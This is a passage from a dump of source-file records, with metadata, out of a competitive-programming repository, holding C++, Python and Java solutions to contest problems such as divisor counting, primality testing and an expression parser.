ask(nxt);\n makeNext(0, 2);\n int a1 = ask(nxt);\n if (a0 && a1)\n makeNext(0, 1, 2);\n else if (!a0 && !a1)\n makeNext(1, 2, 3);\n else if (a0 && !a1)\n makeNext(0, 1, 3);\n else\n makeNext(0, 2, 3);\n a = nxt;\n }\n \n if (a.size() == 3)\n {\n dump();\n int m1 = a.size() / 3;\n int m2 = a.size() - m1;\n copy(a.begin(), a.begin() + m1, back_inserter(x[0]));\n copy(a.begin() + m1, a.begin() + m2, back_inserter(x[1]));\n copy(a.begin() + m2, a.end(), back_inserter(x[2]));\n bool a0 = ask(x[0]);\n bool a1 = ask(x[1]);\n bool a2 = ask(x[1]);\n bool a3 = ask(x[0]);\n\n if (a1 == a2)\n {\n if (a1)\n makeNext(1);\n else\n makeNext(0, 2);\n }\n else if ((a0 && a1) || (a2 && a3))\n {\n makeNext(0, 1);\n }\n else if ((a0 && !a1) || (!a2 && a3))\n makeNext(0, 2);\n else\n makeNext(1, 2);\n a = nxt;\n }\n writeln(\"!\", a[0]);\n string s; readln(s);\n if (s == \":(\")\n {\n writeln(\"!\", a[1]);\n readln(s);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr 
<< fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4813039302825928, "alphanum_fraction": 0.49185043573379517, "avg_line_length": 30.606060028076172, "blob_id": "f1d591fc82f7fbbc798c43a2715ec99cae9d0008", "content_id": "71347a52d46be4a51f5b7921d51e24da110d10d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 928, "num_lines": 66, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.17/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define ll long long\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"diophantus\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d 
%d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid run()\n{\n int n;\n readln(n);\n ll N = (ll) n;\n N *= N;\n int k = 2;\n for (ll i = 1; i <= n; i++)\n if (N % i == 0)\n {\n k += 2;\n if (i * i == N)\n k--;\n }\n printf(\"%d\", k / 2);\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n int T;\n readln(T);\n for (int TT = 0; TT < T; TT++)\n {\n printf(\"Scenario #%d:\\n\", TT + 1);\n run();\n if (TT < T - 1)\n printf(\"\\n\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5491928458213806, "alphanum_fraction": 0.568224310874939, "avg_line_length": 31.877094268798828, "blob_id": "c086c2402b3e7eb2d1f2f6cd0d1fd61e30752231", "content_id": "c5a6c2375e011e150a040ea5a52bf58d9a08b9df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5885, "license_type": "no_license", "max_line_length": 203, "num_lines": 179, "path": "/CodeForce/0490/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": 
"UTF-8", "text": "//template igorjan94 version from 17 November 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n#define fst first\n#define cnd second\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void readln(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void read(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void print(Head& head, Tail&... tail);\ntemplate <class Type1, class Type2> inline void print(pair<Type1, Type2>& p);\ntemplate <class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>& p);\ntemplate <class Head, class... Tail> inline void print_no_space(Head& head, Tail&... 
tail);\nvoid inline writeln(){printf(\"\\n\");}void inline writeln2(){printf(\"\\n\");}void inline readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\nmap<ll, pair<pair<ll, ll>, int> > can;\nmap<int, vector<pair<ll, ll>>> ans;\n\nvoid s(ll x, ll a, ll b, int d)\n{\n while (x % 2 == 0)\n {\n x /= 2;\n a % 2 == 0 ? a /= 2 : b /= 2;\n ++d;\n if (can.find(x) == can.end() || can[x].second > d)\n can[x] = {{a, b}, d};\n }\n}\n\nvoid t(ll x, ll a, ll b, int d)\n{\n if (can.find(x) != can.end())\n ans[d + can[x].second] = {can[x].first, {a, b}};\n while (x % 2 == 0)\n {\n d++;\n x /= 2;\n a % 2 == 0 ? a /= 2 : b /= 2;\n if (can.find(x) != can.end())\n ans[d + can[x].second] = {can[x].first, {a, b}};\n }\n}\n\nvoid run()\n{\n ll a, b, c, d;\n readln(a, b, c, d);\n ll x = a * b,\n y = c * d;\n int depth = 0;\n can[x] = {{a, b}, depth};\n s(x, a, b, depth);\n while (x % 3 == 0)\n {\n x = x / 3 * 2;\n a % 3 == 0 ? a = a / 3 * 2 : b = b / 3 * 2;\n can[x] = {{a, b}, ++depth};\n s(x, a, b, depth);\n }\n depth = 0;\n t(y, c, d, depth);\n while (y % 3 == 0)\n {\n y = y / 3 * 2;\n c % 3 == 0 ? 
c = c / 3 * 2 : d = d / 3 * 2;\n t(y, c, d, ++depth);\n }\n if (ans.size() == 0)\n {\n writeln(-1);\n return;\n }\n int i = -1;\n while (i++ >= -1)\n if (ans.find(i) != ans.end())\n {\n writeln(i);\n writeln(ans[i]);\n return;\n }\n}\n\nint main()\n{\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninline void print(double a){printf(\" \" DOUBLEFORMAT,a);}\ninline void print(int a){printf(\" %d\",a);}\ninline void print(const char* a){printf(\" %s\",a);}\ninline void print(string a){printf(\" %s\",a.c_str());}\ninline void print(long long a){printf(\" %lld\",a);}\ninline void print(unsigned long a){printf(\" %ld\",a);}\ninline void print(unsigned int a){printf(\" %d\",a);}\ninline void print(char a){printf(\" %c\",a);}\ninline void print_no_space(double a){printf(DOUBLEFORMAT, a);}\ninline void print_no_space(int a){printf(\"%d\", a);}\ninline void print_no_space(const char* a){printf(\"%s\", a);}\ninline void print_no_space(string a){printf(\"%s\", a.c_str());}\ninline void print_no_space(long long a){printf(\"%lld\", a);}\ninline void print_no_space(unsigned long a){printf(\"%ld\", a);}\ninline void print_no_space(unsigned int a){printf(\"%d\", a);}\ninline void print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type> inline void print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type> inline void print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\n\ntemplate<class Type1, class Type2> inline void 
print_no_space(pair<Type1, Type2>&a){print_no_space(a.first); writeln2(a.second);}\ntemplate<class Type1, class Type2> inline void print(pair<Type1, Type2>& a) {print_no_space(a.first); writeln2(a.second);}\n\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\ninline void read(double &a){scanf(\"%lf\",&a);}\ninline void read(int &a){scanf(\"%d\",&a);}\ninline void read(string &a){cin>>a;}\ninline void read(long long &a){scanf(\"%lld\",&a);}\ninline void read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2> inline void read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type> inline void read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail> inline void readln(Head& head,Tail&... 
tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.4410480260848999, "alphanum_fraction": 0.47541293501853943, "avg_line_length": 25.334999084472656, "blob_id": "406b4b3d7a29e662e77a47cf55328141a8170b55", "content_id": "eaba40e0ccadf835f024d7909c86b9f3373d6684", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5333, "license_type": "no_license", "max_line_length": 928, "num_lines": 200, "path": "/CodeForce/0396/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int 
&a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, m, k;\n\nconst int trivial_limit = 50;\nint p[1000];\n\nll gcd (ll a, ll b) {\n\treturn a ? gcd (b%a, a) : b;\n}\n\nll powmod (ll a, ll b, ll m) {\n\tll res = 1;\n\twhile (b)\n\t\tif (b & 1)\n\t\t\tres = (res * 1ll * a) % m, --b;\n\t\telse\n\t\t\ta = (a * 1ll * a) % m, b >>= 1;\n\treturn res;\n}\n\nbool miller_rabin (ll n) {\n\tll b = 2;\n\tfor (ll g; (g = gcd (n, b)) != 1; ++b)\n\t\tif (n > g)\n\t\t\treturn false;\n\tll p=0, q=n-1;\n\twhile ((q & 1) == 0)\n\t\t++p, q >>= 1;\n\tll rem = powmod (b, q, n);\n\tif (rem == 1 || rem == n-1)\n\t\treturn true;\n\tfor (ll i=1; i<p; ++i) {\n\t\trem = (rem * 1ll * rem) % n;\n\t\tif (rem == n-1) return true;\n\t}\n\treturn false;\n}\n\nll jacobi (ll a, ll b)\n{\n\tif (a == 0) return 0;\n\tif (a == 1) return 1;\n\tif (a < 0)\n\t\tif ((b & 2) == 0)\n\t\t\treturn jacobi (-a, b);\n\t\telse\n\t\t\treturn - jacobi (-a, b);\n\tll a1=a, e=0;\n\twhile ((a1 & 1) == 0)\n\t\ta1 >>= 1, ++e;\n\tll s;\n\tif ((e & 1) == 0 || (b & 7) == 1 || (b & 7) == 7)\n\t\ts = 1;\n\telse\n\t\ts = -1;\n\tif ((b & 3) == 3 && (a1 & 3) == 3)\n\t\ts = -s;\n\tif (a1 == 1)\n\t\treturn s;\n\treturn s * jacobi (b % a1, a1);\n}\n\nbool bpsw (ll n) {\n\tif ((ll)sqrt(n+0.0) * (ll)sqrt(n+0.0) == n) return false;\n\tll dd=5;\n\tfor (;;) {\n\t\tll g = gcd (n, abs(dd));\n\t\tif (1<g && g<n) return false;\n\t\tif (jacobi (dd, n) == -1) break;\n\t\tdd = dd<0 ? 
-dd+2 : -dd-2;\n\t}\n\tll p=1, q=(p*p-dd)/4;\n\tll d=n+1, s=0;\n\twhile ((d & 1) == 0)\n\t\t++s, d>>=1;\n\tlong long u=1, v=p, u2m=1, v2m=p, qm=q, qm2=q*2, qkd=q;\n\tfor (ll mask=2; mask<=d; mask<<=1) {\n\t\tu2m = (u2m * v2m) % n;\n\t\tv2m = (v2m * v2m) % n;\n\t\twhile (v2m < qm2) v2m += n;\n\t\tv2m -= qm2;\n\t\tqm = (qm * qm) % n;\n\t\tqm2 = qm * 2;\n\t\tif (d & mask) {\n\t\t\tlong long t1 = (u2m * v) % n, t2 = (v2m * u) % n,\n\t\t\t\tt3 = (v2m * v) % n, t4 = (((u2m * u) % n) * dd) % n;\n\t\t\tu = t1 + t2;\n\t\t\tif (u & 1) u += n;\n\t\t\tu = (u >> 1) % n;\n\t\t\tv = t3 + t4;\n\t\t\tif (v & 1) v += n;\n\t\t\tv = (v >> 1) % n;\n\t\t\tqkd = (qkd * qm) % n;\n\t\t}\n\t}\n\tif (u==0 || v==0) return true;\n\tlong long qkd2 = qkd*2;\n\tfor (ll r=1; r<s; ++r) {\n\t\tv = (v * v) % n - qkd2;\n\t\tif (v < 0) v += n;\n\t\tif (v < 0) v += n;\n\t\tif (v >= n) v -= n;\n\t\tif (v >= n) v -= n;\n\t\tif (v == 0) return true;\n\t\tif (r < s-1) {\n\t\t\tqkd = (qkd * 1ll * qkd) % n;\n\t\t\tqkd2 = qkd * 2;\n\t\t}\n\t}\n\treturn false;\n}\n\nbool prime (ll n) { // эту функцию нужно вызывать для проверки на простоту\n\tfor (int i=0; i<trivial_limit && p[i]<n; ++i)\n\t\tif (n % p[i] == 0)\n\t\t\treturn false;\n\tif (p[trivial_limit-1]*p[trivial_limit-1] >= n)\n\t\treturn true;\n\tif (!miller_rabin (n))\n\t\treturn false;\n\treturn bpsw (n);\n}\n\nvoid prime_init() { // вызвать до первого вызова prime() !\n\tfor (int i=2, j=0; j<trivial_limit; ++i) {\n\t\tbool pr = true;\n\t\tfor (int k=2; k*k<=i; ++k)\n\t\t\tif (i % k == 0)\n\t\t\t\tpr = false;\n\t\tif (pr)\n\t\t\tp[j++] = i;\n\t}\n}\n\nvoid run()\n{\n ll n;\n int T;\n cin >> T;\n prime_init();\n forn(qqqq, T)\n {\n cin >> n;\n\n ll pmax = n, pmax1 = n + 1;\n while (!prime(pmax))\n pmax--;\n while (!prime(pmax1))\n pmax1++;\n ll ans1 = (pmax - 2) * pmax1 + (n - pmax + 1) * 2;\n ll ans2 = 2 * pmax * pmax1;\n if (ans1 % 2 == 0)\n {\n ans1 /= 2;\n ans2 /= 2;\n }\n if (ans1 % pmax == 0)\n {\n ans1 /= pmax;\n ans2 /= pmax;\n }\n if (ans1 % 
pmax1 == 0)\n {\n ans1 /= pmax1;\n ans2 /= pmax1;\n }\n cout << ans1 << \"/\" << ans2 << endl;\n }\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4354838728904724, "alphanum_fraction": 0.5483871102333069, "avg_line_length": 61, "blob_id": "4e96eb0e035826fa05df798804f0f56f25ddfbf6", "content_id": "7cf13cc36bd61d45d1ddc2d1c179cf1160a0d33f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62, "license_type": "no_license", "max_line_length": 61, "num_lines": 1, "path": "/CodeForce/0535/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(int('1'+input().replace('4','0').replace('7','1'),2)-1)\n" }, { "alpha_fraction": 0.3833865821361542, "alphanum_fraction": 0.42172524333000183, "avg_line_length": 24.040000915527344, "blob_id": "fd303c7c8ebc715ec7c0344cf124eccab6a3f6d6", "content_id": "7091997fb5e2907765192ec9de2b2d72f2498e70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 626, "license_type": "no_license", "max_line_length": 108, "num_lines": 25, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.09.09/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\nimport sys\n\nf = open(\"input.txt\", \"r\")\nw = open(\"output.txt\", \"w\")\ns = f.readline()[:-1]\n\nans = 1234123412341234\nif re.sub(r\"[<>\\\"\\'&]\", \"\", s) == s:\n w.write(\"-1\")\nelse:\n if re.sub(r\"[<>\\\"\\']\", \"\", s) != s:\n w.write(\"0\")\n else:\n s = s.split('&')[1:]\n for t in s:\n temp = 0\n while t.startswith('amp;'):\n t = t[t.find(';') + 1:]\n temp += 1\n if t.startswith('gt;') or t.startswith('lt;') or t.startswith('apos;') or t.startswith('quot;'):\n temp += 1\n ans = min(ans, temp)\n\n w.write(str(ans))\n" }, { "alpha_fraction": 0.5775970816612244, "alphanum_fraction": 
0.5813767313957214, "avg_line_length": 20.297561645507812, "blob_id": "00d43172065b9cda09919771a18ef77d0dc63f5c", "content_id": "d036275317fb388eb4c0f3fdd083f5afd88e39f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8731, "license_type": "no_license", "max_line_length": 100, "num_lines": 410, "path": "/trash/tpproger/tpG.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.ByteArrayInputStream;\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.UnsupportedEncodingException;\nimport java.text.ParseException;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Scanner;\n\npublic class tpG {\n\n\tpublic static void main(String[] argv) throws ParseException, UnsupportedEncodingException {\n\t\tParser parser = new Parser();\n\t\tScanner sc = new Scanner(System.in);\n\t\tString s = sc.nextLine();\n\t\ts = s + '\\n';\n\t\tInputStream stream = new ByteArrayInputStream(s.getBytes(\"UTF-8\"));\n\t\tString to = sc.next();\n\t\tif (to.charAt(1) != 'O')\n\t\t\tSystem.out.println(parser.parse(stream).v);\n\t\telse\n\t\t{\n\t\t\tstream = new ByteArrayInputStream(s.getBytes(\"UTF-8\"));\n\t\t\tString c = parser.parse(stream).v;\n\t\t\tif (!c.contains(\"x\"))\n\t\t\t{\n\t\t\t\tif (Double.parseDouble(c) == 0)\n\t\t\t\t\tSystem.out.println(\"ANY NUMBER\");\n\t\t\t\telse\n\t\t\t\t\tSystem.out.println(\"NO SOLUTIONS\");\n\t\t\t\tsc.close();\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tint k = c.indexOf('x');\n\t\t\tString rrr = c.substring(k + 1);\n\t\t\tif (!rrr.contains(\"x\") && !c.contains(\"*\") && !c.contains(\"/\") && !c.contains(\"^\"))\n\t\t\t{\n\t\t\t\tc = c.replace('x', '0') + '\\n';\n\t\t\t\tstream = new ByteArrayInputStream(c.getBytes(\"UTF-8\"));\n\t\t\t\tSystem.out.format(\"%.3f\\n\", -Double.parseDouble(parser.parse(stream).v));\n\t\t\t\tsc.close();\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tparser.ok = true;\n\t\t\tdouble l = -100;\n\t\t\tdouble r = 
100;\n\t\t\tdouble eps = 0.01;\n\t\t\tdouble sigma = 0.001;\n\t\t\tparser.X = l;\n\t\t\twhile (parser.X < r)\n\t\t\t{\n\t\t\t\tstream = new ByteArrayInputStream(s.getBytes(\"UTF-8\"));\n\t\t\t\tif (Math.abs(Double.parseDouble(parser.parse(stream).v)) < sigma)\n\t\t\t\t\tSystem.out.print(parser.X + \" \");\n\t\t\t\tparser.X += eps;\n\t\t\t}\n\t\t}\n\t\tsc.close();\n\t}\n}\n\nenum Token {\n\tLPAREN, RPAREN, PLUS, MINUS, TIMES, NUMBER, END, CIRCONFLEXE, X, DIVIDE\n}\n\nclass Tree {\n\tString node;\n\tList<Tree> children;\n\tString v;\n\tboolean ok = false;\n\n\tstatic String eval(String op, String X, String Y) {\n\t\tdouble x, y;\n\t\ttry {\n\t\t\tx = Double.parseDouble(X);\n\t\t\ty = Double.parseDouble(Y);\n\t\t} catch (Exception e) {\n\t\t\treturn X + op + Y;\n\t\t}\n\t\tswitch (op.charAt(0)) {\n\t\tcase '+':\n\t\t\treturn \"\" + (x + y);\n\t\tcase '-':\n\t\t\treturn \"\" + (x - y);\n\t\tcase '*':\n\t\t\treturn \"\" + (x * y);\n\t\tcase '/':\n\t\t\treturn \"\" + (x / y);\n\t\tcase '^':\n\t\t\treturn \"\" + Math.pow(x, y);\n\t\tdefault:\n\t\t\treturn X + op + Y;\n\t\t}\n\t}\n\n\tpublic Tree(double d) {\n\t\tnode = \"\" + d;\n\t\tv = \"\" + d;\n\t\tok = true;\n\t}\n\n\tpublic Tree(String node, Tree... 
children) {\n\t\tthis.node = node;\n\t\tthis.children = Arrays.asList(children);\n\t}\n\n\tpublic Tree(String node) {\n\t\tif (node.equals(\"x\"))\n\t\t\tv = \"x\";\n\t\tthis.node = node;\n\t}\n\n\tpublic String write() {\n\t\tStringBuilder sb = new StringBuilder();\n\t\tif (!(node.charAt(0) >= 'A' && node.charAt(0) <= 'Z'))\n\t\t\tsb.append(node);\n\t\tif (children != null)\n\t\t\tfor (Tree tree : children)\n\t\t\t\tsb.append(tree.write());\n\t\treturn sb.toString();\n\t}\n\n\t@Override\n\tpublic String toString() {\n\t\treturn write();\n\t}\n}\n\nclass LexicalAnalyzer {\n\n\tInputStream is;\n\tint curChar;\n\tdouble prevChar;\n\tint curPos;\n\tToken curToken;\n\n\tpublic LexicalAnalyzer(InputStream is) throws ParseException {\n\t\tthis.is = is;\n\t\tcurPos = 0;\n\t\tnextChar();\n\t}\n\n\tpublic boolean isBlank(int c) {\n\t\treturn c == ' ' || c == '\\t';\n\t}\n\n\tpublic void nextChar() throws ParseException {\n\t\tcurPos++;\n\t\ttry {\n\t\t\tcurChar = is.read();\n\t\t} catch (IOException e) {\n\t\t\tthrow new ParseException(e.getMessage(), curPos);\n\t\t}\n\t}\n\n\tpublic void nextToken() throws ParseException {\n\t\twhile (isBlank(curChar)) {\n\t\t\tnextChar();\n\t\t}\n\t\tprevChar = curChar;\n\t\tswitch (curChar) {\n\t\tcase '(':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.LPAREN;\n\t\t\tbreak;\n\t\tcase ')':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.RPAREN;\n\t\t\tbreak;\n\t\tcase '*':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.TIMES;\n\t\t\tbreak;\n\t\tcase '/':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.DIVIDE;\n\t\t\tbreak;\n\t\tcase '-':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.MINUS;\n\t\t\tbreak;\n\t\tcase '+':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.PLUS;\n\t\t\tbreak;\n\t\tcase '^':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.CIRCONFLEXE;\n\t\t\tbreak;\n\t\tcase 'x':\n\t\tcase 'X':\n\t\t\tnextChar();\n\t\t\tcurToken = Token.X;\n\t\t\tbreak;\n\t\tcase '$':\n\t\tcase -1:\n\t\tcase '\\n':\n\t\tcase '\\r':\n\t\t\tcurToken = 
Token.END;\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tif ('0' <= curChar && curChar <= '9') {\n\t\t\t\tStringBuilder sb = new StringBuilder();\n\t\t\t\twhile ('0' <= curChar && curChar <= '9' || curChar == '.' || curChar == ',' || curChar == 'E') {\n\t\t\t\t\tsb.append((char) curChar);\n\t\t\t\t\tnextChar();\n\t\t\t\t}\n\t\t\t\tprevChar = Double.parseDouble(sb.toString());\n\t\t\t\tcurToken = Token.NUMBER;\n\t\t\t} else\n\t\t\t\tthrow new ParseException(\"Illegal character \\'\" + curChar + \"\\'\", curPos);\n\t\t}\n\t}\n\n\tpublic Token curToken() {\n\t\treturn curToken;\n\t}\n\n\tpublic int curPos() {\n\t\treturn curPos;\n\t}\n}\n\nclass Parser {\n\tLexicalAnalyzer lex;\n\tdouble X;\n\tboolean ok = false;\n\n\tvoid writeln(Object O) {\n\t\t//System.out.println(O + \" \" + lex.curToken);\n\t}\n\n\tTree E(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"E\");\n\t\tswitch (lex.curToken()) {\n\t\tcase MINUS:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = T(acc);\n\t\t\tTree y = D(\"-\" + temp.v);\n\t\t\tTree x = new Tree(\"E\", new Tree(\"-\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase NUMBER:\n\t\tcase X:\n\t\tcase LPAREN:\n\t\t\ttemp = T(acc);\n\t\t\ty = D(temp.v);\n\t\t\tx = new Tree(\"E\", temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree D(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"D\");\n\t\tswitch (lex.curToken()) {\n\t\tcase MINUS:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = T(acc);\n\t\t\tTree y = D(Tree.eval(\"-\", acc, temp.v));\n\t\t\tTree x = new Tree(\"D\", new Tree(\"-\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase PLUS:\n\t\t\tlex.nextToken();\n\t\t\ttemp = T(acc);\n\t\t\ty = D(Tree.eval(\"+\", acc, temp.v));\n\t\t\tx = new Tree(\"D\", new Tree(\"+\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase RPAREN:\n\t\tcase END:\n\t\t\tx = new Tree(\"D\");\n\t\t\tx.v = 